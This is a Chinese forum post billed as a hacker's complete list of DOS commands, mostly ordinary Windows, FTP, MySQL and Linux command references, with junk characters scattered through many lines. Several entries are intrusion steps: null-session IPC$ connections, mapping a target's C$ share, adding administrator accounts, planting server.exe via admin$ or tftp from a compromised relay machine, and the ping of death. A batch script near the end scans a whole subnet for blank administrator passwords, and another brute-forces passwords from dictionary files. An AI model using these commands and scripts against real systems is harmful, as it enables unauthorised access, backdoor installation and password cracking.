黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
+ o0 i' I6 G, e: k6 h4 Y1 \7 X7 Onet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
/ B( u) X% k; i3 V, `! tnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
* [) {6 U, I/ q6 `5 {net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
' X6 b) V, ~3 r& d* T3 H9 Pnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 # q1 g8 F6 i, n8 Z# d
net use h: /del 删除映射对方到本地的为H:的映射
7 `2 G8 Y6 h  M7 h% {: ]) znet user 用户名　密码　/add 建立用户 4 S' `5 ~2 b. g# o( M3 u* j
net user guest /active:yes 激活guest用户 * A5 b+ O# Q8 y; M% r! d
net user 查看有哪些用户
8 @2 ]% ^* |& I, D4 inet user 帐户名 查看帐户的属性
- y( R1 m: Q/ u2 K, G5 ?+ ~0 V0 @net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
( ?! N- R( }! F+ S" o6 Vnet start 查看开启了哪些服务 1 j9 {6 L; J0 r. o& o( p
net start 服务名　 开启服务；(如:net start telnet， net start schedule)
: l: J+ h5 Z  q+ ^9 }' ]! Wnet stop 服务名 停止某服务 ; }6 Y, A& {( b& i' Z, o0 s
net time \\目标ip 查看对方时间
' n8 v# P! G! C5 q* z+ H- mnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 5 |+ s- h! Q8 E$ l. K5 P7 g! T
net view 查看本地局域网内开启了哪些共享 0 Z0 S. _  p  W! F9 K, b$ k# V
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 4 K. }- Z$ E) h4 q# l
net config 显示系统网络设置 / T1 @5 m% g6 g2 W$ b
net logoff 断开连接的共享
5 X/ ]! P  m6 u5 @2 d% ~net pause 服务名 暂停某服务 ' o  k3 ]6 X, }, n6 @! _8 {- j
net send ip "文本信息" 向对方发信息 & [5 b" n' A5 k6 F
net ver 局域网内正在使用的网络连接类型和信息
- W; c9 B6 C4 Q; U2 C: @1 ?3 hnet share 查看本地开启的共享
4 I3 U6 J8 z: }0 N$ A  inet share ipc$ 开启ipc$共享
( R) b( ]/ N: A- D3 b/ F1 Z4 Knet share ipc$ /del 删除ipc$共享
) \3 k; G* ]* V, q" fnet share c$ /del 删除C：共享
( |8 L0 {, }+ _: e% E9 jnet user guest 12345 用guest用户登陆后用将密码改为12345   D8 j4 s/ u9 j$ o5 u  x9 K( G# ~
net password 密码 更改系统登陆密码 0 I# F& [& G: [2 a
netstat -a 查看开启了哪些端口,常用netstat -an 3 w/ s, r3 g1 M' c$ m% g% r
netstat -n 查看端口的网络连接情况，常用netstat -an 4 E& J9 B& w1 V# h
netstat -v 查看正在进行的工作 5 i& D' D* X0 r: ^7 M$ H) B8 I
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） ; o4 H# D: p( Q
netstat -s 查看正在使用的所有协议使用情况
; c7 A) w+ V8 ]- F7 N0 Fnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 ; B3 Y5 H6 {4 d0 R0 h" P
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
. s" }1 L5 ^% vping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 4 ]( `5 J8 z  _
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) + \% H+ ?! @! B! [0 J1 I
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
3 T, W8 X& M2 Otlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
3 V" J* f/ a5 zkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
( o( o* Y" ~3 `, ldel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 5 n* b* a+ _9 `, u: T5 C+ n8 M; |: u
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） ( a( R* |( i; H5 f# K5 e
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 0 b2 ?' R% `: i' U- w! J
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
6 e! Q  C4 B. O" G7 x5 Rat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 3 _3 |/ j7 W1 ?7 u
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
0 y1 L4 X; V8 U. I; H7 M+ N2 tat id号 /delete 停止某个已注册的计划任务
$ ]5 U% E  X* R' G3 G/ E& K/ F) vat 查看所有的计划任务 4 J' E0 ?* X8 _& P* {; l
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
# ~. J2 O/ C: A5 K+ T( Wfinger username @host 查看最近有哪些用户登陆 9 B) S. X0 q( ?1 X
telnet ip 端口 远和登陆服务器,默认端口为23 * V5 g5 k' Y5 ]& [, N* E- T+ u
open ip 连接到IP（属telnet登陆后的命令） 8 |! B) \% i3 \: @$ N" p
telnet 在本机上直接键入telnet 将进入本机的telnet 2 E5 d5 p- ^* `0 W# v+ j
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
% P1 P  H8 v8 E7 x6 Wcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 % N" [8 q3 r7 l5 n% Y/ _4 C5 p
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
* F6 L& K& g6 t  d& g6 O0 U$ Ncopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
2 s' u  }0 j) |9 W6 m  N7 xxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
# A  P8 f! \, E/ ]2 K6 L: ctftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
: C. D) `  h  f: H. N, htftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 $ Z* z: v2 o4 L2 L3 \8 Q% b2 ?* a
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
; j: N1 y0 E. W' d( C0 zroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
2 |9 ]+ J1 m- L- V  Tarp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 ; x; C& L( F- p/ I0 m8 l6 X
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 ) x0 ?) u4 b" V/ \3 \) N2 H
mem 查看cpu使用情况 : L- }- M7 z2 a) G$ h
attrib 文件名(目录名) 查看某文件（目录）的属性 ! r- p! c* Q2 a
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
# B1 k9 c# x1 ddir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间
* G) \/ ?5 w2 S8 edate /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
5 a# P% r5 V0 y0 T/ Rset 指定环境变量名称=要指派给变量的字符 设置环境变量 . U5 Q  J/ d) [
set 显示当前所有的环境变量
0 o0 [4 h. g2 a# Bset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 1 L% u) {& T6 X' S0 E0 L
pause 暂停批处理程序，并显示出：请按任意键继续.... 7 O3 m( P, J% G. \$ d4 j" @
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
8 |2 Z/ o. h' n+ b1 N% m2 Tgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） 7 k0 [' h$ w" s$ T9 ]1 U( F* n* c
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?） 9 {, d4 y7 ^- A9 j, x  B4 S7 q
for 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） 4 p" D- d( h+ ^  G- Y8 k
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
6 m8 _! A5 C1 v' O! C. @/ v7 secho 信息 在屏幕上显示出信息
, p5 P) J4 X- b* }echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
8 U. h9 F* M; mfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 4 r1 W$ T9 j( @+ y7 h0 B  q( E6 J* v
find 文件名 查找某文件 ' L, C! P5 d5 e$ |7 `7 u! ~1 ~
title 标题名字 更改CMD窗口标题名字
9 Y3 X& I) h6 w  O% k4 H# Mcolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
9 R5 i8 ^6 v  I, }- f6 Yprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
% ]; W. f- N, n0 x9 f% |print 文件名 打印文本文件
4 B" A. v/ {* E7 n2 w$ U9 Mver 在DOS窗口下显示版本信息
" {" Q+ o$ L' m# Q; ywinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） - V7 `) R, e0 b8 k% h3 k
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS ' w9 j5 w) S2 L& m& R
md　目录名 创建目录
( Z& s- H, Q" x6 h  k- V- k, yreplace 源文件　要替换文件的目录 替换文件
" [4 j3 _, E/ a$ z9 ^ren 原文件名　新文件名 重命名文件名 0 V3 }& g7 ], c5 @, a
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
9 a: g2 V. ?! t  I/ xtype 文件名 显示文本文件的内容 ! f0 \; V$ ~- a2 @* p' M
more 文件名 逐屏显示输出文件
% N9 T- h1 w( Udoskey 要锁定的命令＝字符+ o5 `: r5 ?( G' Q/ `$ K4 N9 W8 T
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
9 k. d: t2 g3 ^5 z% Qtaskmgr 调出任务管理器 5 z- i: h: X) m- E8 q" l: ?
chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误   x0 P+ b. T' z
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
/ V  k0 |7 J: x1 }2 k, Fexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe $ r3 W# i6 S7 `# S0 y. P4 m) s, Y7 x
path 路径\可执行文件的文件名 为可执行文件设置一个路径。 & U7 V) l' }7 ]" F  a' I" L
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
' F4 c! J6 n( d( j3 m; V/ \regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
# a8 S: p/ n! ^regedit /e 注册表文件名 导出注册表 1 M7 {- w; G$ P9 }
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
% b2 L9 o; `1 t9 ocacls 文件名 查看文件的访问用户权限列表 $ _8 A; }: h5 a9 R' U
REM 文本内容 在批处理文件中添加注解 - L+ ~6 W! b# W# @  A! [- L% H, Z
netsh 查看或更改本地网络配置情况
8 M, o6 a, F8 k6 tIIS服务命令：
7 B* F. A+ i9 t: R1 W1 Uiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）
: F6 W' W  k$ w4 aiisreset /start或stop 启动（停止）所有Internet服务 2 y, F( W6 i" [5 l. K6 j6 O- @
iisreset /restart 停止然后重新启动所有Internet服务
  k% |" {+ ~3 G- `5 Jiisreset /status 显示所有Internet服务状态 8 g4 y& ?9 S1 r# m5 ~, P0 p
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 $ ^" v; t3 }3 B* y3 \& q0 N
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 ' l# Y( E; O4 N+ ?
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
2 v3 k  m! G9 M+ P/ K: p0 _7 diisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 3 \0 D, ?* F. a, Z5 B8 ]3 I
FTP 命令： (后面有详细说明内容)
; |4 x) j% H) q7 iftp的命令行格式为:) L7 [& p8 K6 l; u
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。8 g& c  C+ a5 ]6 P: W. L* ?& K
－d 使用调试方式。
# e5 a2 y. ?+ \3 P4 _－n 限制ftp的自动登录,即不使用.netrc文件。
. i5 }* H5 k  b! f－g 取消全局文件名。
* c! q" f& ^3 @- z# K0 i0 Zhelp [命令] 或 ？[命令] 查看命令说明 7 o' ^' K* H( ^: E9 X
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. # |3 l  \1 s8 Q
pwd 列出当前远端主机目录 : ?5 X) ]3 A/ t* {' R4 t: ?+ r
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
& N) o- ^4 R1 R1 Iget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
( i% m3 c! R' z' _& kmget [remote-files] 从远端主机接收一批文件至本地主机 6 z* D/ p& U6 C9 _+ \, @
mput local-files 将本地主机中一批文件传送至远端主机
6 c, C) G4 \/ l& Ldir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 % v4 ?% U8 E" R6 ?
ascii 设定以ASCII方式传送文件(缺省值)
8 r) c3 U: n9 ]* Wbin 或 image 设定以二进制方式传送文件
# d3 H: S% N" p9 S5 g0 Fbell 每完成一次文件传送,报警提示 ! q; X5 c1 M% ~
cdup 返回上一级目录
& f# A' Y1 Z( D$ K4 ~( ~& m9 Eclose 中断与远程服务器的ftp会话(与open对应)   |* k' W+ W) z6 G7 ^; c6 j
open host[port] 建立指定ftp服务器连接,可指定连接端口 ! i+ \% |$ u+ Z3 Q" M8 [( Q
delete 删除远端主机中的文件
9 R  g4 n7 `% t; d# A$ {3 Kmdelete [remote-files] 删除一批文件 # N$ \& R8 b' A; @, O, z
mkdir directory-name 在远端主机中建立目录 ; m: l4 Y; j5 L! {1 K* W
rename [from] [to] 改变远端主机中的文件名   t7 z% _4 c/ M" r$ V5 ^( V6 E# Q" V
rmdir directory-name 删除远端主机中的目录 & q$ @. S! i2 \, T; J6 O! `
status 显示当前FTP的状态 . c6 Z+ b4 E, I
system 显示远端主机系统类型
9 A- a# b7 I) g, O" A; duser user-name [password] [account] 重新以别的用户名登录远端主机 & U1 f! r; y4 S" ~( A7 i
open host [port] 重新建立一个新的连接 ( t# d7 R; P/ F5 n
prompt 交互提示模式 - n( V& T! ^: d- E7 d& }
macdef 定义宏命令 + e2 c/ _2 ?" d/ Z9 g+ j8 J
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
' y4 W5 v7 ?" P; {* P# q# r+ L/ cchmod 改变远端主机的文件权限 8 M% B# F  m  ^
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 # Q8 t" U! z6 n- W1 u
cd remote－dir 进入远程主机目录 . P9 g- [/ f' F( r- ^- g
cdup 进入远程主机目录的父目录
& ?" c) [7 H. z+ U! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip   j: G+ R" P8 ?9 J
MYSQL 命令：
2 H3 k3 {: X1 `4 `( W6 X- Hmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。. O6 M" d1 G$ \, |- G
（例：mysql -h110.110.110.110 -Uroot -P123456 ' R) a8 W3 K1 A1 E  U
注:u与root可以不用加空格，其它也一样）
4 W/ A5 u1 X: p# u, Dexit 退出MYSQL , f2 V! ~4 G% w2 r# W# s# p
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
6 v' f0 E' S1 _) Cgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
. u+ ~% T4 b5 Q0 O  y3 R  Lshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
4 l+ e# X: f- `( `9 {# guse mysql；
* J+ p% ?% J, \, i1 p" G) jshow tables; 显示库中的数据表 # H2 [. W- k, k( Z/ Y: V" I' o
describe 表名; 显示数据表的结构 ; e! P, L0 Q. B- V; E1 v5 B
create database 库名; 建库 6 e( }2 I4 L# A' Q9 W/ f4 z
use 库名；
$ i9 U+ s8 c4 U1 X1 gcreate table 表名 (字段设定列表)； 建表
' s3 {( @2 X8 {7 I) Xdrop database 库名;
. V* Q; V2 w- {3 ~8 v) w1 F' W% Jdrop table 表名； 删库和删表 4 a, n( \$ j5 j# \
delete from 表名; 将表中记录清空
# P0 A' u0 z! O5 k8 ?select * from 表名; 显示表中的记录
- e2 r3 \) p3 v# a# ?7 y, z+ i1 Lmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 : }7 R6 ^% k+ d9 }/ \/ O
win2003系统下新增命令（实用部份）： 4 x8 X1 w! }7 I: l' }4 R
shutdown /参数 关闭或重启本地或远程主机。
! w# z: A/ O7 X- [+ t参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
( Z7 `. @" l& u( _4 @+ v例：shutdown /r /t 0 立即重启本地主机（无延时）
9 p* f$ ]) O: K/ |' K) T. l5 etaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。6 x# Y, T3 q+ T2 O9 o- m* u- d
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
7 L! Y. b7 `( O: V. l) B* A& }tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。# e  @4 T; p: m/ E! b
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程- E5 M- f0 {5 y+ p
Linux系统下基本命令： 要区分大小写$ G: F2 d: d" t0 h& P9 n
uname 显示版本信息（同win2K的 ver）
! p' M0 L, L' Odir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） / P4 a* Q/ _% B/ E6 P5 B1 A- P
pwd 查询当前所在的目录位置
4 T1 R# I7 o- x! Ncd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
! }0 @; J- V( O! Mcat 文件名 查看文件内容 ; @: @) i% Q$ S0 Z
cat >abc.txt 往abc.txt文件中写上内容。
  z6 |; p8 P. A( {# g% Xmore 文件名 以一页一页的方式显示一个文本文件。 ! m4 n5 ~% Q$ Q4 g5 c
cp 复制文件
( O9 B' N  u% g  Xmv 移动文件 3 t+ N* u0 Y" v! a
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 / j" @% M5 ~1 ?
mkdir 目录名 建立目录
6 r3 X9 e8 q9 nrmdir 删除子目录，目录内没有文档。
) _- R: D$ L1 G/ e1 f; }2 Achmod 设定档案或目录的存取权限
1 l, W- u0 K+ Q  y% N! q. qgrep 在档案中查找字符串 # x: f" q% T4 g+ F+ N% X
diff 档案文件比较
# x, g1 Q( z- O8 ?0 Nfind 档案搜寻 3 ?; I- R+ p0 O' {4 P
date 现在的日期、时间
( _  K7 Y" \% y" ^8 K" }who 查询目前和你使用同一台机器的人以及Login时间地点 , m, m) u+ X3 L# K9 a! g2 G& s
w 查询目前上机者的详细资料 1 a- b) S; g9 C: k0 h
whoami 查看自己的帐号名称
; A  {7 \& J6 a* @groups 查看某人的Group & L0 l0 \* N  s4 L/ o1 o$ g
passwd 更改密码 - T2 J; r/ S, r4 g! |* U( V
history 查看自己下过的命令 1 ^( h- e, |+ e" U
ps 显示进程状态
/ L( I! U" s6 Pkill 停止某进程
. ?) I- _- J2 m7 u1 n8 e2 w, D; V' K7 ggcc 黑客通常用它来编译C语言写的文件
9 }# _8 p8 @2 o+ S% Asu 权限转换为指定使用者 9 C: D/ V  g5 c, I4 b
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 " {! [1 q( N9 Q
ftp ftp连接上某服务器（同win2K
5 @1 o1 h7 y3 W附：批处理命令与变量
8 @- b2 B& A1 n* E1：for命令及变量 基本格式：
) B: n" E  {' n0 OFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。* q' ^+ i$ v; |2 ?* ^$ a
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
2 b0 E' L. C1 l  s# D' r& e6 d(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
8 \) ~) j' }) F" qcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开3 C/ m- K3 B3 C4 \9 X
command_parameters：为特定命令指定参数或命令行开关
1 E! l- s; ?& @0 t3 hIN (set)：指在(set)中取值；DO command ：指执行command
: E! H) D1 N" y/ S7 q9 j0 h, v参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 1 s% D9 c: a; a3 u4 c
用法举例：
1 d; s/ z' ~0 J& H( y; \@echo off
) H2 J! O+ f5 |. v  l0 Pecho 用法格式：test.bat *.*.* > test.txt 7 _2 J* O, u2 b+ ?6 g8 w8 A! ^
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
( ?2 Y! p, o  k) m5 E# N存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。2 A: J: L+ A* ~1 E1 e
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
- C+ m6 E( P- y  {, u0 J! {8 K* m@echo off 2 v! [$ g' d- e; G( {5 C: R
echo 用法格式：ok.bat ip
, [0 U6 i" K+ g+ n0 r+ O% }; fFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 0 t4 R3 o( n2 J0 S8 c
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。# e$ s/ _. A( \4 I4 h; o
2：if命令及变量 基本格式：
' Z' j! ~; M8 s8 Y* ZIF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。# h+ e: p5 u' `
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。: a! h) n4 M) a2 U' i
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。 6 p4 `, U9 T5 _* v3 i" e
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
6 c, l; @8 Z  X/ O6 B3 F. U例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
7 ?; v5 _/ ]" u, R! ]IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
9 ?, `, i+ Z+ G例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
# p% X- e' S6 I# r7 {' G+ ?IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”